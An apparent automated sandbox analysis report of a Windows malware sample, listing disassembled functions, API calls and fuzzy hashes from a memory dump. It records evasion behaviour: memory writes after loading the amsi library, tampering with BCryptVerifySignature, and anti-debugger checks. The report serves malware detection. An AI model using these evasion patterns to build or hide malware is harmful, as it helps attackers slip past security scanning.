2e11820-2e11827 Sleep 8573->8574 8574->8563 8575->8566 8576->8577 8584 2e11875 8576->8584 8585 2e118f8 8577->8585 8586 2e1188c-2e118a6 call 2e11500 8577->8586 8587 2e11a6d-2e11a7f 8578->8587 8588 2e11a5e-2e11a63 call 2e11500 8578->8588 8579->8587 8589 2e118ca 8580->8589 8590 2e118cc-2e118da 8580->8590 8592 2e118fd-2e11936 8581->8592 8596 2e118ed-2e118f7 8581->8596 8584->8577 8585->8592 8586->8592 8588->8587 8589->8590 8590->8592
                                                                                                                                        APIs
                                                                                                                                        • Sleep.KERNEL32(00000000), ref: 02E117D0
                                                                                                                                        • Sleep.KERNEL32(0000000A,00000000), ref: 02E117E6
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.23065524959.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_2e11000_Oupzhkpr.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Sleep
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3472027048-0
                                                                                                                                        • Opcode ID: 617f3fe2d34bf5c9dc2ebc08b66ff026a0e6922232ae8bb4e3e0abc0fbb7f2ff
                                                                                                                                        • Instruction ID: 8cd16a91a172eb09fd38cd6260772a66efd772dc2b15a30f669a24a5534747a0
                                                                                                                                        • Opcode Fuzzy Hash: 617f3fe2d34bf5c9dc2ebc08b66ff026a0e6922232ae8bb4e3e0abc0fbb7f2ff
                                                                                                                                        • Instruction Fuzzy Hash: E0B13176A803418BDB05CF29D488796BBE1EB85354F4CC679E61D8F3C4C370A891CB90
                                                                                                                                        Function 02E28798 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 40libraryloaderCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 8599 2e28798-2e287bd LoadLibraryW 8600 2e28807-2e2880d 8599->8600 8601 2e287bf-2e287d7 GetProcAddress 8599->8601 8602 2e287d9-2e287f8 call 2e27cf8 8601->8602 8603 2e287fc-2e28802 FreeLibrary 8601->8603 8602->8603 8606 2e287fa 8602->8606 8603->8600 8606->8603
                                                                                                                                        APIs
                                                                                                                                        • LoadLibraryW.KERNEL32(?,?), ref: 02E287AC
                                                                                                                                        • GetProcAddress.KERNEL32(02E71390,BCryptVerifySignature), ref: 02E287C6
                                                                                                                                        • FreeLibrary.KERNEL32(02E71390,02E71390,BCryptVerifySignature,bcrypt,?,02E713D0,00000000,02E713A4,02E2A3BF,ScanString,02E713A4,02E2A774,ScanBuffer,02E713A4,02E2A774,Initialize), ref: 02E28802
                                                                                                                                          • Part of subcall function 02E27CF8: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02E27D6C
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.23065524959.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_2e11000_Oupzhkpr.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Library$AddressFreeLoadMemoryProcVirtualWrite
                                                                                                                                        • String ID: BCryptVerifySignature$bcrypt
                                                                                                                                        • API String ID: 1002360270-4067648912
                                                                                                                                        • Opcode ID: b9e353f0d2068382d0e6f0ef6fe4fc5f2270a42c81b0920e0a45bbf0373be00c
                                                                                                                                        • Instruction ID: 79ea8b27887ba5a3ae2a3f9d23987a5c7ba64f80d9b16c459332380c5bddf33b
                                                                                                                                        • Opcode Fuzzy Hash: b9e353f0d2068382d0e6f0ef6fe4fc5f2270a42c81b0920e0a45bbf0373be00c
                                                                                                                                        • Instruction Fuzzy Hash: 4CF0C271AC03247EFB10EB6AA845FB6379CA38435CF42593AB10D8F540C7B0089CCB60
                                                                                                                                        Function 02E28704 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 35libraryCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                        • LoadLibraryW.KERNEL32(amsi), ref: 02E2870D
                                                                                                                                          • Part of subcall function 02E280C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02E28113
                                                                                                                                          • Part of subcall function 02E280C0: GetProcAddress.KERNEL32(?,?), ref: 02E28125
                                                                                                                                          • Part of subcall function 02E27CF8: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02E27D6C
                                                                                                                                        • FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 02E2876C
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.23065524959.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_2e11000_Oupzhkpr.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressLibraryProc$FreeLoadMemoryVirtualWrite
                                                                                                                                        • String ID: DllGetClassObject$W$amsi
                                                                                                                                        • API String ID: 2980007069-2671292670
                                                                                                                                        • Opcode ID: 8df2b6713553709b91bb66bf7e0e5a7367bbeb9a64d6a610df56841c6857d53c
                                                                                                                                        • Instruction ID: 058bbc59f4ad373ee6909bdccbd1896c4b1c740a46224b84a4a39aeb45087c05
                                                                                                                                        • Opcode Fuzzy Hash: 8df2b6713553709b91bb66bf7e0e5a7367bbeb9a64d6a610df56841c6857d53c
                                                                                                                                        • Instruction Fuzzy Hash: F9F0C26048C381B9E200E6788C45F4FBFCE4B92224F04DE1CB1E99A2D2D679D108CBB7
                                                                                                                                        Function 02E2EBE8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 28libraryloaderCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 8616 2e2ebe8-2e2ec02 GetModuleHandleW 8617 2e2ec04-2e2ec16 GetProcAddress 8616->8617 8618 2e2ec2e-2e2ec36 8616->8618 8617->8618 8619 2e2ec18-2e2ec28 CheckRemoteDebuggerPresent 8617->8619 8619->8618 8620 2e2ec2a 8619->8620 8620->8618
                                                                                                                                        APIs
                                                                                                                                        • GetModuleHandleW.KERNEL32(KernelBase), ref: 02E2EBF8
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 02E2EC0A
                                                                                                                                        • CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 02E2EC21
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.23065524959.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_2e11000_Oupzhkpr.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressCheckDebuggerHandleModulePresentProcRemote
                                                                                                                                        • String ID: CheckRemoteDebuggerPresent$KernelBase
                                                                                                                                        • API String ID: 35162468-539270669
                                                                                                                                        • Opcode ID: 9f6d8b48ee23ef59c18e42033bade6ec20d634f33e62a6efc193e3a6723b5f51
                                                                                                                                        • Instruction ID: e3d4aa30c1a68b81705204efbb11b0a17a68fce880bc3d52913e3a5952bef69c
                                                                                                                                        • Opcode Fuzzy Hash: 9f6d8b48ee23ef59c18e42033bade6ec20d634f33e62a6efc193e3a6723b5f51
                                                                                                                                        • Instruction Fuzzy Hash: 6AF027709442BCAED702A7E8888A7DCFBA94B05328F28A790A026710C0E7702648C650
                                                                                                                                        Function 02E11A8F Relevance: 7.7, APIs: 6, Instructions: 173sleepCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 8621 2e11a8f-2e11a9b 8622 2e11aa1-2e11aa5 8621->8622 8623 2e11b6c-2e11b6f 8621->8623 8624 2e11aa7-2e11aae 8622->8624 8625 2e11b08-2e11b11 8622->8625 8626 2e11b75-2e11b7f 8623->8626 8627 2e11c5c-2e11c60 8623->8627 8630 2e11ab0-2e11abb 8624->8630 8631 2e11adc-2e11ade 8624->8631 8625->8624 8632 2e11b13-2e11b27 Sleep 8625->8632 8633 2e11b81-2e11b8d 8626->8633 8634 2e11b3c-2e11b49 8626->8634 8628 2e11c66-2e11c6b 8627->8628 8629 2e116e8-2e116f0 call 2e11644 8627->8629 8647 2e116f5-2e1170b VirtualFree 8629->8647 8637 2e11ac4-2e11ad9 8630->8637 8638 2e11abd-2e11ac2 8630->8638 8635 2e11ae0-2e11af1 8631->8635 8636 2e11af3 8631->8636 8632->8624 8640 2e11b2d-2e11b38 Sleep 8632->8640 8642 2e11bc4-2e11bd2 8633->8642 8643 2e11b8f-2e11b92 8633->8643 8634->8633 8641 2e11b4b-2e11b5f Sleep 8634->8641 8635->8636 8644 2e11af6-2e11b03 8635->8644 8636->8644 8640->8625 8641->8633 8648 2e11b61-2e11b68 Sleep 8641->8648 8645 2e11bd4-2e11bd9 call 2e114c0 8642->8645 8646 2e11b96-2e11b9a 8642->8646 8643->8646 8644->8626 8645->8646 8652 2e11bdc-2e11be9 8646->8652 8653 2e11b9c-2e11ba2 8646->8653 8650 2e11716 8647->8650 8651 2e1170d-2e11714 8647->8651 8648->8634 8657 2e11719-2e11723 8650->8657 8651->8657 8652->8653 8658 2e11beb-2e11bf2 call 2e114c0 8652->8658 8654 2e11bf4-2e11bfe 8653->8654 8655 2e11ba4-2e11bc2 call 2e11500 8653->8655 8661 2e11c00-2e11c28 VirtualFree 8654->8661 8662 2e11c2c-2e11c59 call 2e11560 8654->8662 8657->8621 8658->8653
                                                                                                                                        APIs
                                                                                                                                        • Sleep.KERNEL32(00000000), ref: 02E11B17
                                                                                                                                        • Sleep.KERNEL32(0000000A,00000000), ref: 02E11B31
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.23065524959.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_2e11000_Oupzhkpr.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Sleep
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3472027048-0
                                                                                                                                        • Opcode ID: 4beeb67d0b7bf5e00a1f47504e0f7226d9d02c1da8095370e849a71a3bc3549d
                                                                                                                                        • Instruction ID: f163ce2f99eb7fe26dc5f2a081ec9b2af1ea978cd016bc76c2b1f1b91f6527e9
                                                                                                                                        • Opcode Fuzzy Hash: 4beeb67d0b7bf5e00a1f47504e0f7226d9d02c1da8095370e849a71a3bc3549d
                                                                                                                                        • Instruction Fuzzy Hash: C051C0756803408FEB15CF69C988B96BBD0AB45318F58D5BEE64CCF2C2E7709885CB91
                                                                                                                                        Function 02E2881C Relevance: 4.6, APIs: 3, Instructions: 65libraryloaderCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetModuleHandleA.KERNEL32(00000000,00000000,00000000,02E28903), ref: 02E28860
                                                                                                                                        • GetProcAddress.KERNEL32(02E71384,00000000), ref: 02E28879
                                                                                                                                          • Part of subcall function 02E27CF8: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02E27D6C
                                                                                                                                        • FreeLibrary.KERNEL32(02E71384,00000000,02E71388,Function_000055D8,00000004,02E71398,02E71388,000186A3,00000040,02E7139C,02E71384,00000000,00000000,00000000,00000000,02E28903), ref: 02E288E3
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.23065524959.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_2e11000_Oupzhkpr.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressFreeHandleLibraryMemoryModuleProcVirtualWrite
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3588955079-0
                                                                                                                                        • Opcode ID: 914816a10446a0dd496002b1646178e861237bde7c5753dbd4fa42c845fc4933
                                                                                                                                        • Instruction ID: b75cc37e3bd4b9e5b118a8d126a7b67d75ecffe1f534fdad088cfb973807009f
                                                                                                                                        • Opcode Fuzzy Hash: 914816a10446a0dd496002b1646178e861237bde7c5753dbd4fa42c845fc4933
                                                                                                                                        • Instruction Fuzzy Hash: CE114270AC0344BFEB00FBB8CD02A5E77A99B45700F92E4747509ABA80DA7499048B24
                                                                                                                                        Function 02E14168 Relevance: 3.1, APIs: 2, Instructions: 125COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.23065524959.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_2e11000_Oupzhkpr.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: cf40e180b550bf439c5dc872ef8f6c75c3113a25bbc2484cdf75f10915deff7a
                                                                                                                                        • Instruction ID: 67583341c2487a89e38fdc6a3aa888dbb5e1ad014e9b60618d1fe145eb16d84d
                                                                                                                                        • Opcode Fuzzy Hash: cf40e180b550bf439c5dc872ef8f6c75c3113a25bbc2484cdf75f10915deff7a
                                                                                                                                        • Instruction Fuzzy Hash: A3415B75DC02049FDB64EF29E48879A7BE2FB05319F98E469E9089B380C73098D5CF61
                                                                                                                                        Function 02E15814 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetModuleFileNameA.KERNEL32(20D81B20,?,00000105), ref: 02E15832
                                                                                                                                          • Part of subcall function 02E15A78: GetModuleFileNameA.KERNEL32(00000000,?,00000105), ref: 02E15A94
                                                                                                                                          • Part of subcall function 02E15A78: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02E15AB2
                                                                                                                                          • Part of subcall function 02E15A78: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02E15AD0
                                                                                                                                          • Part of subcall function 02E15A78: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02E15AEE
                                                                                                                                          • Part of subcall function 02E15A78: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000005,00000000,02E15B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02E15B37
                                                                                                                                          • Part of subcall function 02E15A78: RegQueryValueExA.ADVAPI32(?,02E15CE4,00000000,00000000,00000000,00000005,?,?,00000000,00000000,00000000,00000005,00000000,02E15B7D,?,80000001), ref: 02E15B55
                                                                                                                                          • Part of subcall function 02E15A78: RegCloseKey.ADVAPI32(?,02E15B84,00000000,00000000,00000005,00000000,02E15B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02E15B77
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.23065524959.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_2e11000_Oupzhkpr.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Open$FileModuleNameQueryValue$Close
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2796650324-0
                                                                                                                                        • Opcode ID: 8d2262c70beaae2bbfdede8a2f275eb551cfb6ca49d82510be69373b1f735333
                                                                                                                                        • Instruction ID: df581d72abc7ee7fbedf0c696ee37cef0317cb89c81d3144579567c2a45dc764
                                                                                                                                        • Opcode Fuzzy Hash: 8d2262c70beaae2bbfdede8a2f275eb551cfb6ca49d82510be69373b1f735333
                                                                                                                                        • Instruction Fuzzy Hash: DAE06D71A402148BCB10DE5888C4B5637D8AB48754F409575ED68DF34AD371D9108BE0
                                                                                                                                        Function 02E17E34 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetFileAttributesA.KERNEL32(00000000,?,02E32A41,ScanString,02E6CF00,02E3AFD0,OpenSession,02E6CF00,02E3AFD0,ScanBuffer,02E6CF00,02E3AFD0,OpenSession,02E6CF00,02E3AFD0,Initialize), ref: 02E17E3F
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.23065524959.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_2e11000_Oupzhkpr.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AttributesFile
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3188754299-0
                                                                                                                                        • Opcode ID: fe3f8c7547375d3b190e2bd7b8d67a4577ec7d15bc45dec9ccb4955a6e8d04a7
                                                                                                                                        • Instruction ID: dcd72dcf2ee2bcd86c7bc6a0dce62b1b1ed4e41669b2965baf93050c45c07b04
                                                                                                                                        • Opcode Fuzzy Hash: fe3f8c7547375d3b190e2bd7b8d67a4577ec7d15bc45dec9ccb4955a6e8d04a7
                                                                                                                                        • Instruction Fuzzy Hash: E5C08CF02922080E5E50A2FC0CC454A42CC090463C3A4BF75F13AC62D2D322D8922410
                                                                                                                                        Function 02E3BB48 Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • timeSetEvent.WINMM(?,00000000), ref: 02E3BB58
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.23065524959.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_2e11000_Oupzhkpr.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Eventtime
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2982266575-0
                                                                                                                                        • Opcode ID: e91b6b12a47a8cbb46c267045385499a43cf3b1db0d4ffa743b02d1c94bddf1b
                                                                                                                                        • Instruction ID: 367dcafacfe1ae972f2cd8176fd2ada55f0bf74ff907b56b86e3ac89ce1518a5
                                                                                                                                        • Opcode Fuzzy Hash: e91b6b12a47a8cbb46c267045385499a43cf3b1db0d4ffa743b02d1c94bddf1b
                                                                                                                                        • Instruction Fuzzy Hash: 01C092F07C13803EFA10A6F81CD6FA3A58DD308B01F606426BA05FE2C2D5E24C50CA20
                                                                                                                                        Function 02E14BE4 Relevance: 1.5, APIs: 1, Instructions: 10memoryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • SysAllocStringLen.OLEAUT32(00000000,?), ref: 02E14BEB
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.23065524959.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_2e11000_Oupzhkpr.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AllocString
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2525500382-0
                                                                                                                                        • Opcode ID: db6a3f861f0a6b35b86245416a4c288905a5a0e602f748b147a7570e0d217214
                                                                                                                                        • Instruction ID: 4c1f32e49bfe9603772b22c0001469684871ef3cadcb6268510730823635ec74
                                                                                                                                        • Opcode Fuzzy Hash: db6a3f861f0a6b35b86245416a4c288905a5a0e602f748b147a7570e0d217214
                                                                                                                                        • Instruction Fuzzy Hash: DBB092782C821218EA5421610D10FF2008C0B5138EF84B0B1AF28C82C0FB04C0009832
                                                                                                                                        Function 02E14BFC Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • SysFreeString.OLEAUT32(00000000), ref: 02E14C03
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.23065524959.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_2e11000_Oupzhkpr.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FreeString
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3341692771-0
                                                                                                                                        • Opcode ID: 6fc0f88f0b4d12cbeda0546aa3c9b2a61d9b338520cfab902635a24ef7a42f2a
                                                                                                                                        • Instruction ID: 3bcfccf4028db1e21f79a4918be0acb2458f2574aa5b7c5c634819209074e11a
                                                                                                                                        • Opcode Fuzzy Hash: 6fc0f88f0b4d12cbeda0546aa3c9b2a61d9b338520cfab902635a24ef7a42f2a
                                                                                                                                        • Instruction Fuzzy Hash: D4A011BC0802020AAA0B2228000002A20322EE038838AE0B82A080A0808A2A8000E830
                                                                                                                                        Function 02E11682 Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • VirtualAlloc.KERNEL32(00000000,?,00101000,00000004), ref: 02E116A4
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.23065524959.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_2e11000_Oupzhkpr.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AllocVirtual
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4275171209-0
                                                                                                                                        • Opcode ID: edad90bf4e066039eee6b53d4f16b788e784c882516c8e12bb0eb3578c57ddee
                                                                                                                                        • Instruction ID: e0ec520e8118dab7c2f40dcbe036dbe3f147b5e7eeb300ef7f274e96f55476c2
                                                                                                                                        • Opcode Fuzzy Hash: edad90bf4e066039eee6b53d4f16b788e784c882516c8e12bb0eb3578c57ddee
                                                                                                                                        • Instruction Fuzzy Hash: F7F09AB2A807956BD710EE5ADC80B82BB94FB00325F458139FA4C9B340D770A854CBD4
                                                                                                                                        Function 02E116E6 Relevance: 1.3, APIs: 1, Instructions: 26COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 02E11704
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.23065524959.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_2e11000_Oupzhkpr.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FreeVirtual
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1263568516-0
                                                                                                                                        • Opcode ID: a1e1e40abe88de422cad60f7fa28db27261920487047f7d6d9706fee6581534a
                                                                                                                                        • Instruction ID: 87bc3f450055d002a5caf1bf956a4480715b762fa04e04d8a1edf4c8ef6ff699
                                                                                                                                        • Opcode Fuzzy Hash: a1e1e40abe88de422cad60f7fa28db27261920487047f7d6d9706fee6581534a
                                                                                                                                        • Instruction Fuzzy Hash: CCE0DF713803006FE7109A3D4C407126AC8AF45224F249575F208CF2C1D2A0D8008B24